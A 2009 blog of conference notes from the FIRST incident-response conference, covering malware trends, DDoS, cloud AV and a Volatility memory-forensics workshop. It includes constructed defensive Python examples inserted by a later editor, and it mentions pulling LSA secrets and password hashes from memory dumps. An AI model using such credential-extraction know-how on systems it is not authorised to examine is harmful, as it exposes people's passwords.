Ramblings of the änal security guy

Sometimes pointless, always rambling, best ignored…

21st FIRST Conference – Day 5

Posted by ChrisJohnRiley on July 3, 2009

Today is the last day of the conference. It’s been great so far, but it’s not over yet ;)

09:00 Security and the younger generation – Ray Stanton

This is the first time in history that many countries have 4 generations of people working alongside each other.

Who are the younger generation?

  • Language
  • Culture
  • Demands
  • Speed of learning
  • Expectations
  • Pushing the boundaries

Generation Y refers to the group of people born between 1982 and 2000. The majority of Gen Y have spent a significant amount of time leading an online lifestyle.

Gen Y statistics (Junco and Mastrodicasa Study 2007)

  • 97% own a computer
  • 94% own a mobile
  • 76% use Instant Messenger (15% logged in 24/7)
  • 34% use websites as their primary source of news
  • 28% author a blog and 44% read blogs
  • 49% download music using peer-to-peer file sharing
  • 75% of college students have a Facebook account
  • 60% own some type of portable music and/or video device such as an iPod

Companies must make their security policies relevant to Gen Y. Language that is easily understood and interpreted by Gen X is interpreted differently by the newer generation.

Gen X are fast at adopting new technologies (they are also the largest group), however Gen Y are the ones that push the boundaries and innovate.

Find ways to make it work

  • Moodles – styles of education
  • Listen
  • Engage
  • Never, ever, say No! They will just go around you
  • Participate
  • Embrace

10:15 Conficker Research project – Aaron Kaplan (CERT.AT)

The guys from CERT.at gave a nice graphical geographical representation of Conficker infection rates using a Google Earth overlay.

By looking at the scale of infections over time it was possible to create an animation showing the clean-up process in various countries around the world. Top of the list of infections were China, Brazil, and Russia.

11:00 Show me the evil: A graphical look at online crime – Dave Deitrich (Team Cymru)

Bad neighborhoods (most infected systems) – China, US, Germany and Brazil are top. However these are the locations with the largest number of online users. When looked at as a percentage of online users, these countries are way down on the list.

Charts of infections by IP-ranges and statistical information available on Team Cymru’s website.

Concentration of bot-net controllers in more developed regions – US, Germany, Korea

When tracking bot activity (Conficker) the number of bots reporting in dips on a Sunday due to systems in companies being powered off. The time at which systems reported in also supported this assumption, as most bots were reporting in within working hours (depending on the region of the bot).

DDoS tracking showed that targets in the US and Europe were most popular. However everybody is affected, as service providers spread the cost of DDoS protection between all of their customers.

Lack of data collection in areas such as Africa is a problem when forming statistics. If more data were available then a more complete picture could be put together.

11:30 Internet Analysis System (IAS): Module of the German IT early Warning System – Martin Bierwirth/Andre Vorbach

Designed as part of a project to protect critical infrastructure. Passive sensors are located at partner sites and provide information (filtered and anonymised) on network traffic. These partners are mostly government networks, but sensors are also installed in other partner networks.

Every five minutes a sensor transmits about 560kb of data.

IAS data privacy

  • Does not monitor data with personal reference
  • Does not reassemble TCP flows
  • Independent of IDS systems
  • Revoke context of a packet after building its counter

Manual research on the data is done through a program developed in co-ordination with German universities. Tracking of outbound HTTP GET requests allowed BSI to check the User-Agent strings and confirm that users are not using insecure versions of software like Firefox. Charting showed versions from 1.0 through to the latest (at the time of the data) 3.0x version.

IAS gives data to be able to ask the right questions. By using profiling it is possible to automatically identify traffic patterns that are out of the norm for the network.

Example: a DNS traffic spike across 3 separate networks. By looking at the traffic it appeared to be a large number of spoofed DNS requests for the “.” record, with spoofed source IP addresses. It was discovered that the 3 networks were being used as part of a reflective DDoS attack. By tracking across multiple partners it is easier to see when attacks are targeted; when monitoring only government networks it is easy to think that all attacks are targeted ones.
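Added example, not code from the IAS project or the talk: a small Python version of the profiling described above. Per-5-minute DNS query counters from three partner networks are constructed inline, each network is compared against its own baseline, and the flags are then cross-checked between networks so that an event seen by every partner (the reflective DDoS case) can be told apart from one seen by a single partner. The baseline method (median plus MAD), the threshold factor and the network names are my assumptions, not details from the presentation.

```python
"""Profile-based spike detection across several sensor networks.

Constructed example: each network reports one DNS query counter per
five-minute interval. A network's own history supplies its baseline,
and intervals flagged by several networks at once are separated from
intervals flagged by a single network.
"""
from statistics import median

# Constructed sample data: 12 five-minute intervals per network.
# Interval 8 carries a spike on all three networks (the reflective-DDoS
# pattern); interval 3 carries a spike on net_c only.
COUNTERS = {
    "net_a": [410, 395, 420, 405, 398, 430, 415, 402, 9800, 412, 399, 408],
    "net_b": [120, 118, 125, 119, 121, 117, 123, 120, 3100, 122, 119, 124],
    "net_c": [2050, 2010, 1990, 7600, 2030, 2045, 2000, 2020, 41000,
              2015, 2035, 2025],
}


def robust_baseline(values):
    """Median and median absolute deviation (MAD) of a counter series.

    MAD is used instead of the standard deviation so that the spike being
    looked for does not inflate the baseline it is compared against.
    """
    med = median(values)
    mad = median(abs(v - med) for v in values)
    return med, mad


def flag_spikes(values, k=10):
    """Return the set of indices whose value exceeds median + k * MAD.

    A MAD of zero (perfectly flat series) is floored at 1 so that a
    spike on an otherwise constant counter is still caught.
    """
    med, mad = robust_baseline(values)
    threshold = med + k * max(mad, 1)
    return {i for i, v in enumerate(values) if v > threshold}


def correlate(counters, k=10):
    """Map each flagged interval to the set of networks that flagged it."""
    hits = {}
    for net, series in counters.items():
        for idx in flag_spikes(series, k):
            hits.setdefault(idx, set()).add(net)
    return hits


def classify(hits, total_networks):
    """Label each flagged interval by how many partners saw it.

    'widespread'     -> every network flagged it (reflective/untargeted)
    'single-network' -> only one partner saw it (worth checking as targeted)
    'partial'        -> some but not all partners saw it
    """
    labels = {}
    for idx, nets in sorted(hits.items()):
        if len(nets) == total_networks:
            labels[idx] = "widespread"
        elif len(nets) == 1:
            labels[idx] = "single-network"
        else:
            labels[idx] = "partial"
    return labels


if __name__ == "__main__":
    hits = correlate(COUNTERS)
    for idx, label in classify(hits, len(COUNTERS)).items():
        print(f"interval {idx}: {label} ({', '.join(sorted(hits[idx]))})")
```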

Aggregated data extends the perspective of individual networks.

Prospects: Deploy more sensors, Automatic correlation of data

13:30 New Developments on Brazilian Phishing Malware – Jacomo Piccolini

Changes from 2008 to 2009

Malware levels have remained around the same: 30-40,000 unique samples per year. Although the amount has remained constant, the quality has increased. Less usage of Delphi and Visual Basic in programming; a move towards Java / C++.

Targeted attacks are rare. Most attacks spread through the use of spam email giving links to users (themed attacks).

Many malware samples are using simple attacks that alter the local hosts file to redirect victims to phishing sites (password stealing, etc…). This is not rocket science. Keep it simple. Most examples concentrate on adding hosts entries for Brazilian banks.
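Added example, not code from the talk: a Python check for the hosts-file redirection described above. It parses hosts-file text the way the resolver reads it (comments, blank lines, several names per line) and reports any name that resolves somewhere other than a loopback address, optionally narrowed to a watch list. The sample hosts content, the example.test/example domains and the watch list are constructed placeholders, not the bank domains from the presentation.

```python
"""Report hosts-file entries that redirect named sites.

Constructed example: SAMPLE_HOSTS mimics a Windows hosts file with two
injected lines that point banking hostnames at a phishing server.
"""
import ipaddress

# Constructed sample hosts file (192.0.2.0/24 is documentation space).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
192.0.2.44      www.example-bank.test  example-bank.test   # injected
192.0.2.44      internetbanking.example.test               # injected
10.0.0.5        intranet.corp.example   # legitimate internal override
"""

# Constructed watch list standing in for the institutions worth checking.
WATCHLIST = {
    "example-bank.test",
    "internetbanking.example.test",
}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs from hosts-file text."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and padding
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue   # malformed address; the resolver ignores it as well
        for name in parts[1:]:
            yield addr, name.lower()


def _on_watchlist(name, watchlist):
    """True if the name or any parent domain is on the watch list."""
    labels = name.split(".")
    return any(".".join(labels[i:]) in watchlist for i in range(len(labels)))


def suspicious_entries(text, watchlist=None):
    """Return [(hostname, ip)] for names mapped to a non-loopback address.

    Without a watch list every non-loopback mapping is reported, which
    also surfaces legitimate internal overrides; with one, only names on
    the list (or subdomains of them) are reported.
    """
    findings = []
    for addr, name in parse_hosts(text):
        if addr.is_loopback:
            continue
        if watchlist is not None and not _on_watchlist(name, watchlist):
            continue
        findings.append((name, str(addr)))
    return findings


if __name__ == "__main__":
    for name, ip in suspicious_entries(SAMPLE_HOSTS, WATCHLIST):
        print(f"{name} -> {ip}")
```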

InfoSEG

Attacks against government information systems using malware. Access to the Brazilian database gives you access to all information on a citizen (car registration, job information, income, Tax information, travel permits, Visas, family ties, personal information, arrest history, picture, gun permit information, signature, etc…). The malware uses a simple overlay to steal the logon for a user. These logons were on sale on the streets of Sao Paulo, Brazil for $1000.

This information was covered in the media in Brazil. I can’t find the footage in English, however the original is available on youtube.

Newer malware installs a BHO (Browser Helper Object). This then routes all your traffic through a single proxy when the traffic meets specific criteria (in most cases access to bank websites). The proxy then redirects to another phishing server to steal the credentials. When this malware was run through VirusTotal, no AV vendor detected it.

Stronger focus on malware that blocks access to documents, pictures and a range of other files. The machine then warns the user to use a specific AV to clean the system. For $10 you can then buy the (scam) AV product to regain access to your files. Low cost extortion. The malware locks the files through a “GetActiveWindow” call to block the applications. All files are still present; if you copy the files off to another machine then they are all available again.

DNS cache poisoning is also still an issue. On 11th April 2009 one of the biggest banks in Brazil suffered DNS poisoning that redirected traffic to a phishing site. The issue was resolved in 7 hours (it was on a Sunday).

Brazilian Initiatives

Defensive Line website (www.linhadefensiva.org) –> community blog that deals with end-user infections. Acts as a CSIRT team (ARIS-LD) and also provides an anti-malware tool (bankerfix). This team is looking for assistance in developing their new software solution. Please check the website if you can assist them.

Malware Patrol (www.malwarepatrol.net) –> Provides blocking lists for many applications (MTA, proxy, DNS…). These are updated on an hourly basis and made available for any purpose. Some files tracked by Andre are still online after 4 years of tracking them.

Federal Police: Operation Trilha –> 691 law enforcement agents, 139 arrest warrants, 136 search warrants, 12 Brazilian states (28 cities), in addition to arrests in Brazil, 1 arrest was made in the US.

Malware is an alternative source of income and for some “just a job” – social issue

My take from this presentation is that the Brazilian malware economy is very internally focused: Brazilians specifically targeting other Brazilians, and Brazilian banks in particular. This is something to watch in the future, however, as the malware authors become more proficient they are beginning to branch out into other markets.

FIN
Overall the FIRST conference was a great experience and gave me a different perspective than my normal conferences (mostly hacker style cons like CCC, Blackhat, etc…). The fact it was in Japan just adds to the overall effect of course. I wish I had more time to look around and really take in the culture. Hopefully I can arrange some time next year to make a long tour of Japan with my lovely girlfriend. I’m accepting donations ;) Here’s to next year’s FIRST conference in Miami.


21st FIRST Conference – Day 4

Posted by ChrisJohnRiley on July 2, 2009

Today’s a short day due to the AGM taking place this afternoon. I’m hoping to make the most of the time and visit the Kyoto Imperial Palace or the craft market. Still, you never know what’ll happen here.

09:00 A Railway Operator’s Perspective on the lessons of the Great Hanshin-Awaji Earthquake – Takayuki Sasaki

Mr Sasaki (from JR West Railways) talked about how to manage an unexpected disaster recovery situation. The earthquake measured 7.3 on the Richter scale and caused in excess of 10 Trillion Yen in damages. 6433 people lost their lives in the disaster.

3 rival railway companies (JR West, Hankyu, and Hanshin) teamed up to ensure that passengers were able to travel easily.

Crisis control methods put in place after the earthquake .:

  • Introduction of urgent earthquake detection and alarm system
  • Anti-seismic reinforcement work
  • Establishment of a second Shinkansen General Control Center

11:00 In The Cloud Security – Greg Day

Estimated in excess of $1trillion loss through cybercrime and data loss in 2008.

Q1 2009 – 12 million new IPs zombied since January –> 50% increase since 2008

Koobface – more than 800 new variants in March 2009

In 1990 Dr Solomon’s Antivirus had signatures for 296 viruses (+61 variants). Wouldn’t it be nice to go back to those days.

Historically AV has been designed to protect against single large threats. The new method is many more, smaller viruses and variants designed to be re-wrapped and re-used over and over again.

How the virus landscape has changed .:

  • 1987-2000 “Method” –> Viruses were all about proving that it was possible. Viruses were slow and not released often.
  • 2000-2003 “Speed”–> Speed of spread was the key. These viruses could be seen just by looking at the backbone and seeing the increase in traffic.
  • 2004-xxxx “Volume” –> The idea of hitting a target with many different variants until one bypassed your defenses.

Proactive behavioral controls work by examining processes to form a baseline of their memory usage and data-flows. If larger amounts of data are seen that would cause a buffer-overflow, then an alarm is triggered. Even in a standard environment it’s not easy to implement a complete lockdown of the system using this technique. This means reaching a mid-point between the newer techniques and the older style signature and change control checks (monitoring registry changes, etc…).

The huge increase in malware in recent years has been caused by the move away from smart people both writing and using malware. The people capable of writing the malware are now moving to a better business model where they sell the tools for creating a virus/malware. Tools such as Shark can create many combinations of malware depending on the settings selected and packers used. This lowers the barrier to entry so that anybody can have customized malware.

** 30 minutes in…. first mention of cloud (yes, he really did use the Final Fantasy character in his presentation)

The cloud can be used to improve response times by returning metadata on files seen in order to track possible malicious traits. This information is sent up to the servers and compared to other gathered data. The existing DNS protocol is used to transfer the metadata to the server and to respond. If the suspicious file is known to the AV vendor then they can alert you through a DNS response (signed and encrypted). All data sent is anonymous.

In the case of targeted attacks, the aggregation point in the cloud is used to map the fingerprint of possible attacks. Artemis clients send fingerprints ~2 hours before samples are received.

The trend has moved away from self-replicating malware and more towards self-infecting malware (the user infects themselves by visiting a website).

Using fingerprinting it’s also possible to recognise sites that are infected with hidden iframes and develop blacklists on the fly from information gathered from all users. Once a threat fingerprint has been identified, it can be detected on any site that has been infected using the same method/injection. This same scenario can also be used with message reputation to improve existing spam mail filtering.

www.trustedsource.org –> Gives an overview of the data seen from these initiatives

The problem of gathering more intelligence: most customers request more intelligence on what is currently being seen, however they are not happy to be one of the sources that provide information. This has hopefully been resolved by restricting the information sent to hashes of what is seen, and not files or other identifiable information.

13:30 Chinese Hacker Community and Culture, Underground Malware Industry – Zhao Wai (KnownSec)

Part 1: Chinese hacker culture
Part 2: Underground industry
Part 3: How do we fight back?

Trends (Blackhats and Whitehats)

  • 1998-2003 : Server-Side
  • 2002-2007 : Client-Side (Image format, Office documents, IE)
  • 2006 – xxxx : 3rd Party –> For Profit

3rd Party applications are very weak on security and full of bugs.

Sometimes legitimate security researchers in China have their research accidentally released or used in attacks. This is because of other hacking groups attacking the researchers’ networks, or the researchers selling the exploits through untrustworthy services.

Blackhats in China

  • Age: Young (maybe not), Talented, and rich
  • Most are not in big cities
    • Why? Economic related ?
    • More fired engineers – more hackers ?
  • Blackhat Culture: Baidu zhidao forum, QQ (Chinese social networking)
  • Underground industry: everybody has a role
  • Not using IRC anymore. More often on public forums or QQ
  • International ? Not yet ?

There are currently 300 Million internet users in China. People in China are scared to use e-commerce websites due to fear of being hacked and having their information stolen. Malware is not only written in China, but is also a problem for users in China.

China is not only the world’s factory, but also the world’s malware factory.

New Kanji and phrases have been created in the last few years to describe malware functions (e.g. GuaMa: Hooking Horse, injecting malcode into websites).

Many different teams are involved in the malware process. Separate teams deal with the exploitation, sales, and various other parts of the process.

In 2006/2007 a majority of malware used known vulnerabilities in 3rd party applications. Currently 0-day attack code is used in various 3rd party products. The recent malware versions like to exploit logic bugs (Baidu toolbar, snapshot).

0-day market underground

  • They love client-side vulnerabilities
    • Easier to find
  • Price is better than ZDI
    • Researchers still prefer ZDI
  • Sometimes 0-days are leaked to the market
    • Security professionals
    • Professional whitehats

The KnownSec team talked last year at Xkungfoo(xcon) about the SNS worm plus drive-by download attacks. This year there is a worm spreading through the QQ social network.

The KnownSec team are trying to crawl Chinese websites to find and label the malicious websites. However they’re not Google. More water vapour than cloud computing. Easy to DDoS. It was found that the majority of the malicious servers are located in a small area of China. Some large areas have no malicious servers at all. Within China .com domains account for 52% of the malicious domains (followed closely by .cn with 32%). The team downloads around 858 downloaders per day. Of these 16% are brand new. The average detection rate of these downloaders on VT is 60%. In tests McAfee-GW-Edition, AntiVir and eSafe find the most samples. ClamAV finds only 10% of the samples. 50% of the malicious websites are not found by the Google Safe Browsing filters.

Some information on these figures can be found on the KnownSec website.

This research has been used to create a better filtering and protection engine. Webmon API –> Currently in private BETA

Day 4 was a little shorter than the others, but it means I might finally get some sleep. I should be over my jet-lag by the time I get to fly home I’m sure ;)


21st FIRST Conference – Day 3

Posted by ChrisJohnRiley on July 1, 2009

Today’s big thing is the Volatility training from Andreas Schuster. I’ll be trying to attend some talks after the workshop is over where possible.

09:00 Attacks Against the Cloud: Combating Denial-of-Service – Jose Nazario

Cisco anticipates that 90% of bandwidth usage will eventually be used for video services. Historically the Internet has been a nice to have. As services such as communications move to the Internet it becomes a need to have. Availability and quality of service becomes more of a serious issue. Telephony services are a key point. People need to communicate, especially in the event of an emergency. 911 emergency services need to be available all the time.

The generic definition of the cloud – “If somebody else’s stuff breaks, your business grinds to a halt”

Internet attack sizes have grown from 200Mbps in 1999 (based on code-red traffic levels) to 50 Gbps in 2009. The trend appears to be a doubling of attack bandwidth year on year.

Historical effects of Denial of Service attacks

  • 1999 –> Routers die under forwarding load
  • 2002 –> Servers die under load
  • 2005 –> Renewed targets in infrastructure (DNS, peering points)
  • 2008 –> Web services

Service providers are now able to cope with the attack traffic. In turn this has caused the problem to move on to the customer. With the advent of caching servers and load balancers the attackers have moved to methods designed to overload backend servers with hard-to-resolve requests. This bypasses the protections put in place in most organisations.

The change of Denial of Service from fun to criminal

  • 1999 –> IRC wars lead to widespread adoption of primitive DoS/DDoS tools
  • 2001 –> Worms: Code Red, Nimda, SQL Slammer
  • 2004 –> Rise of the IRC botnets: Online attacks go criminal
  • 2007 –> Estonia attacks cause governments around the world to worry about cyberwar
  • 2009 –> Iran election results lead to DDoS, Twitter, etc…

Providers have responded by protecting their own infrastructure and using manual blackhole routing as a protection measure (2001). Providers then started to offer DoS protection as a service to customers using BGP injections (2003). Finally providers began protecting key converged services such as VoIP and IPTV using multi-Gbps inline filtering (2007).

09:30 I am a Kanji: Understanding security one character at a time – Kurt Sauer

Teaching somebody about security is not unlike teaching somebody how to understand Japanese kanji. There are around 50,000 kanji, and they can have multiple definitions. Not an easy task.

Great presentation. I’d suggest looking at the slides/video to get the full effect. Nothing ground breaking, but definitely worth the time.

11:00 Windows Memory Forensics with Volatility – Andreas Schuster

Like yesterday, this is more of a workshop than a presentation. I’ll post up any links / information that might be useful however. You can find the slides and workshop information (along with other good information) on Andreas’ blog.

Part 1: Refresher – Memory Fundamentals, acquisition, kernel objects, analysis techniques
Part 2: Using Volatility – Volatility Overview, analysis w/ Volatility
Part 3: Programming – Developing plug-ins for Volatility

PART 1: Refresher

Live Response

  • Focus on “time”
  • Acquisition and analysis in one step
    • Untrusted environment
    • Not repeatable
  • Tools tend to be obtrusive

Research from Aaron Walters and Petroni (2006) details the percentage of RAM changed when a system is in an idle state and during a memory dump –> the Blackhat DC presentation from 2007 details this information. Research shows that 90% of freed process objects are still available after 24 hours of idle activity.

Focus of live response is on main memory, network status and processes. When performing memory acquisition, installing agents prior to the incident can help to minimize the impact.

Expert Witness Format – Used primarily by EnCase. libewf project – Joachim Metz (http://sourceforge.net/projects/libewf/)

“powercfg /hibernate on” –> Enables hibernate from the command-line on Windows systems. More information on the powercfg command can be found on Microsoft TechNet.

Basic memory analysis: piping memory through strings and looking at interesting results. –> Remember to set ASCII/ANSI and UNICODE

  • Many false positives
  • Memory is fragmented
  • Conclusions hard to form (hard to prove connections between strings, discoveries might be mis-leading)
  • Obfuscation

List walking: Find initial pointer and traverse the doubly linked process list –> Applies to single lists and trees

  • Easy to subvert (anti-forensics)

Scanning: Define signature and scan the entire memory for a match

  • Slow
  • OS dependent (patches can break things)

There are also a number of hybrid methods used.
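Added example, not code from the workshop or from Volatility: a toy Python memory image in which process records are chained in a circular doubly linked list. Unlinking one record (the anti-forensic subversion the notes mention) makes list walking miss it, while a scanner that checks every offset for the record signature and sanity-checks the pointers still finds it, and also rejects a stray signature planted in unrelated data. The 32-byte record layout, tag and offsets are invented for the demonstration and are not the Windows EPROCESS layout.

```python
"""List walking versus signature scanning over a toy memory image.

A bytearray stands in for physical memory. Each 'process record' is a
constructed 32-byte structure hanging off a list head, linked the way
the kernel's process list is.
"""
import struct

# Record layout (constructed):
#   0: b"Proc" tag | 4: pid u32 | 8: flink u32 | 12: blink u32 | 16: name[16]
TAG = b"Proc"
REC = struct.Struct("<4sIII16s")
REC_ALIGN = 0x40          # records start on 64-byte boundaries
HEAD = 0x40               # offset of the list head record
MEM_SIZE = 0x400


def _write(mem, off, pid, flink, blink, name):
    REC.pack_into(mem, off, TAG, pid, flink, blink,
                  name.encode().ljust(16, b"\0"))


def _read(mem, off):
    tag, pid, flink, blink, name = REC.unpack_from(mem, off)
    return tag, pid, flink, blink, name.rstrip(b"\0").decode(errors="replace")


def build_image(procs):
    """Lay out the head plus one record per (pid, name), circularly linked."""
    mem = bytearray(MEM_SIZE)
    offsets = [HEAD] + [0x100 + REC_ALIGN * i for i in range(len(procs))]
    _write(mem, HEAD, 0, offsets[1], offsets[-1], "HEAD")
    for i, (pid, name) in enumerate(procs, start=1):
        flink = offsets[(i + 1) % len(offsets)]   # wraps back to HEAD
        blink = offsets[i - 1]
        _write(mem, offsets[i], pid, flink, blink, name)
    # A stray tag inside unrelated data: a scanner must not trust it blindly.
    mem[0x300:0x30C] = TAG + b"\xff" * 8
    return mem, offsets


def unlink(mem, off):
    """Detach one record from the chain without erasing it (DKOM-style hiding)."""
    _, _, flink, blink, _ = _read(mem, off)
    struct.pack_into("<I", mem, blink + 8, flink)    # prev.flink = next
    struct.pack_into("<I", mem, flink + 12, blink)   # next.blink = prev


def walk_list(mem, head=HEAD):
    """Follow flink pointers from the head; returns pids in list order.

    This is what a pslist-style tool does: it only sees linked records.
    """
    pids, off = [], _read(mem, head)[2]
    while off != head and len(pids) <= MEM_SIZE // REC.size:   # loop guard
        _, pid, off, _, _ = _read(mem, off)
        pids.append(pid)
    return pids


def _plausible_pointer(ptr):
    """Pointer sanity check used to reject false-positive tag matches."""
    return ptr % REC_ALIGN == 0 and ptr + REC.size <= MEM_SIZE


def scan_records(mem):
    """Check every 4-byte-aligned offset for the tag plus sane link pointers.

    Like psscan-style tools this finds unlinked records too, at the cost
    of a full pass over memory and the need to filter false positives.
    """
    pids = []
    for off in range(0, len(mem) - REC.size + 1, 4):
        if mem[off:off + 4] != TAG:
            continue
        _, pid, flink, blink, _ = _read(mem, off)
        if off == HEAD or not (_plausible_pointer(flink)
                               and _plausible_pointer(blink)):
            continue
        pids.append(pid)
    return sorted(pids)


def demo():
    """Hide one process and compare what each technique recovers."""
    mem, offsets = build_image([(4, "System"), (368, "smss.exe"),
                                (1337, "evil.exe"), (612, "lsass.exe")])
    before = walk_list(mem)
    unlink(mem, offsets[3])            # offsets[3] is the record for pid 1337
    return before, walk_list(mem), scan_records(mem)


if __name__ == "__main__":
    before, after, scanned = demo()
    print("walk before unlink:", before)    # [4, 368, 1337, 612]
    print("walk after unlink: ", after)     # [4, 368, 612]
    print("scan after unlink: ", scanned)   # [4, 368, 612, 1337]
```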

PART 2: Using Volatility

Originally developed in 2006 as a tool called FATKit. This was then used as the basis for VolaTools in 2007. The VolaTools project was transferred to Microsoft through a company buyout. The project was restarted and completely reprogrammed as an open-source project – Volatility.

SVN version is available from http://code.google.com/p/volatility/

Standard options for Volatility are .:

-h, --help            show this help message and exit
-f FILENAME, --file=FILENAME (required) XP SP2 Image file
-b BASE, --base=BASE  (optional, otherwise best guess is made) Physical offset (in hex) of directory table base
-t TYPE, --type=TYPE  (optional, default="auto") Identify the image type (pae, nopae, auto)

For help on specific functions, volatility <function_name> -h

http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins contains a list of published plug-ins for the framework

A number of functions within Volatility have been updated to improve speed and reliability. An example of this is the thrdscan/thrdscan2 function. The updated versions usually run faster than the original versions. It may be best to check the output between the older/newer versions to ensure that you are receiving consistent output and not any false positives/negatives.

volatility modules -f <memory_dump> –> outputs a list of loaded modules (driver files). The modscan2 function will give a more comprehensive list of loaded (and previously loaded) modules (if the metadata is still present in memory). The moddump function can be used to extract a module from the memory dump for further analysis.

Using scanning modules is very helpful as it will reveal information on not only what was loaded at the time of the memory dump, but also scan the entire memory for any matching signatures of what may have been loaded/unloaded prior to the dump. This is the case for not only modules, but also processes as well.

The pstree plug-in is useful to output a process tree (ASCII style).

However not all processes are listed. By using psscan2 with the “-d > output.file” option you can create a file that can be opened in ZGRViewer. This shows a full graphical output of the process list including the start and end time of each process. ZGRViewer also offers very helpful search functionality to help find processes within the tree.

By finding the PID of a process you can then use the files and dlllist functions to find the open files and loaded DLLs for the process in question. By running getsids you can examine what account started the process, as well as whether it was interactive or not. You can also use regobjkeys to examine what was in use within the registry by each PID. By running the procdump function (with the PID of the suspicious executable) you can extract the process into a file for further examination.

Examining open connections and sockets is also simple. Volatility has the connections function (along with connscan/connscan2) and the sockets function (along with sockscan/sockscan2). These functions output the PID of the creating process so it can be mapped back to processes discovered in the process listing performed earlier. As with the majority of the scanning functions, they may find information on sockets/connections that existed but were no longer open when the memory dump was performed.

As part of the VolReg plug-in you can also output things like the LSA secrets, as well as password hashes. These rely on information from the hivescan/hivelist functions. Performing the hashdump is something that’s been covered before on various blogs. If you want a rundown of how to perform a complete dump of password hashes, I’d suggest checking out Chris Gates’ post on the carnal0wnage blog, or the forensiczone walkthrough.

Some interesting plug-ins to explore –> cryptscan (to search memory for Truecrypt passwords), malfind (to search for possible injected code), dmp2raw/raw2dmp (for converting formats — Crash Dump format).

This was a great workshop. I’d love to have spent longer going through things. However the point was to demonstrate how to use the Volatility tool and not to teach n00bs like me how to do proper analysis. I’ll have to take the time to run through the examples and slides again to really get to know the process fully.

16:00 Incident Response and Voice for Voice Services – Lee Sutterfield

Protection of dedicated VoIP services by using a specifically designed Voice Firewall alongside existing firewall technologies. Unlike a normal IP-based firewall, a Voice Firewall is designed to restrict the actions of a user within the policy of the organisation. This includes restrictions such as limiting the destination of dialling from specific extensions (block long distance, international), limit on the time and duration of calls. It also offers the ability to restrict incoming calls to prevent access to dial-up services from unwanted numbers. This can be implemented to prevent war-dialling attacks by restricting based on the source of the call and pattern of inbound calls.

A Voice Firewall is primarily designed to prevent things like toll fraud instead of defending the system from attack. It also offers better visibility into the usage of your voice network and provides alerts when certain trigger levels are exceeded.

Another usage of Voice Firewalls is blocking calls to prevent crank calls, or active war-dialling attempts. Any calls from this number are then blocked and the attempt is logged. Using this technology it is possible to protect against / log attempts of vishing attacks.

Voice Firewalls can be used to assist with the following security points .:

  • Unauthorised modems
  • Remote access (modem) attacks
  • Phone service misuse
  • Toll fraud
  • Harassing/Threatening calls
  • Malicious software (triggering calls to pay numbers)
  • Vishing attacks
  • Denial of Service (against VoIP services)
  • Bomb threats (call recording)
  • Improve voice uptime
  • Stop data leakage
  • Reduce telecom total cost
  • Baseline/plan/optimize (new VoIP deployments)
  • Policy driven call recording

Voice Firewall technology addresses age-old vulnerabilities and lock-down mechanisms. This increases your ability to provide improved incident response and preventative services to the enterprise, as well as via Managed Security Services for Voice (MSSVs).

Well we’ve hit the mid-point of the conference. It’s been great so far. Tonight we have the FIRST conference banquet. Hope they have sushi else there might be a riot ;)


21st FIRST Conference – Day 2

Posted by ChrisJohnRiley on June 30, 2009

I’m still not over the jet-lag, but still, day 2 of FIRST rages on. The pre-conference talk started with the announcement that Interpol has been accepted as an official FIRST member. The winners of the best practices contest (this year’s focus was on detection of attacks) were announced, with Cisco CSIRT taking the award with a paper on NetFlow (the papers should be available on the FIRST website later today). Second place was awarded to CERT-FI.

DAY 2

09:00 Reconceptualizing Security – Bruce Schneier

Thinking about what security and risk means and how we deal with it. Security by definition involves human beings. We need to define how people think about security. You can have security without actually feeling secure. You can feel secure when you’re not. These are 2 different things. A separation should be made between the feeling of security and the reality of security.

Security is a trade-off. Giving up something in order to gain a degree of security. However what is given up needs to be worth the trade-off. Whether or not something is worth it comes down to a personal choice. People have a natural intuition when it comes to security. Although humans are on one hand good at evaluating their security, they can also sometimes be very bad at it. This is what drove Bruce to research “The Psychology of Security”.

Humans are built to make quick decisions. Getting the good answer fast is better than getting the best answer slow.

Humans rationalise the familiar as more secure than the unfamiliar. People are afraid to fly, yet are happy to drive, although the risk is higher. 42,000 people die every year in the US from car accidents. This figure is much higher than plane accidents. Humans overreact to rare risks more than to risks we accept every day. We will be more likely to stop doing something if a close friend is affected than if many, many people who we don’t know are affected.

The economic incentive is to make people feel secure. However the feeling and reality don’t always match.

Discussion of the various mental models based on experience, press, government, industry and human feelings. Humans are better at focusing on risks that are in the short-term, and are very bad at realising risk that is far off.

Security decisions are often made for reasons with nothing to do with security. The person making the decision will manipulate the model based on their view of reality and their requirements. Stakeholders will try to convince others that their views are correct.

If you believe something, then evidence against that belief will often be ignored, whereas positive evidence will reinforce that belief.

Flashbulb moments that change people’s mental models – the 9/11 terrorist attacks and the JFK assassination are examples of US flashbulb moments. Each culture has its own.

Change happens slowly. Even easy changes such as changing people’s smoking habits have taken decades. People are quick to reject new models if they don’t agree with their feelings. Our feeling on global warming (what we see in front of us) doesn’t always agree with the new scientific model of what will happen.

Security reality and security feeling should be balanced. If people feel insecure they will not trust the technology, if they feel too secure they will be at risk.

All effort is put into feeling secure. Some part of that however spills over into the reality of being secure. Some things that are implemented to increase the feeling of security in-fact lower the reality of security.

Building a surveillance infrastructure makes us less secure.

Economics doesn’t support security and reliability. Features are the main driving force in technology.

11:00 Network Monitoring Special interest group: Monitoring & Analyzing Client-side Attacks

This special interest group was in the form of a workshop.

You can download the vmware image (Debian), PDFs and PCAP files used in the workshop – HERE.

The demos focus on client-side / drive-by downloads using examples for fast-flux and non-fast-flux style attacks. The workshop uses a downloadable Debian VM with some self developed tools (based on Rhino).

I opted to skip the afternoon section of the workshop. I’ll work on the exercises on the plane home ;)

13:30 Comprehensive Response: A Bird’s eye view of Microsoft Critical Security Update MS08-067 – Microsoft

Microsoft Security Response Center / Microsoft Malware Protection Center give an overview of Microsoft’s response to the MS08-067 vulnerability and the rise of conficker.

The MSRC has 3 main areas of responsibility .:

  • Investigate and Resolve Vulnerability Reports
  • Microsoft Security Response Process
  • Building Relationships and Communications

When releasing a security update Microsoft follow a dual track to manage and deal with the patching process.

  1. Vulnerability Reporting
  2. Triaging
  3. Managing Finder Relationship
  4. Content Creation
  5. Release

In tandem with the above process (at steps 2-4), a technical fix is developed and tested.

  1. Creating the Fix
  2. Testing
  3. Update Dev Tools and Practices

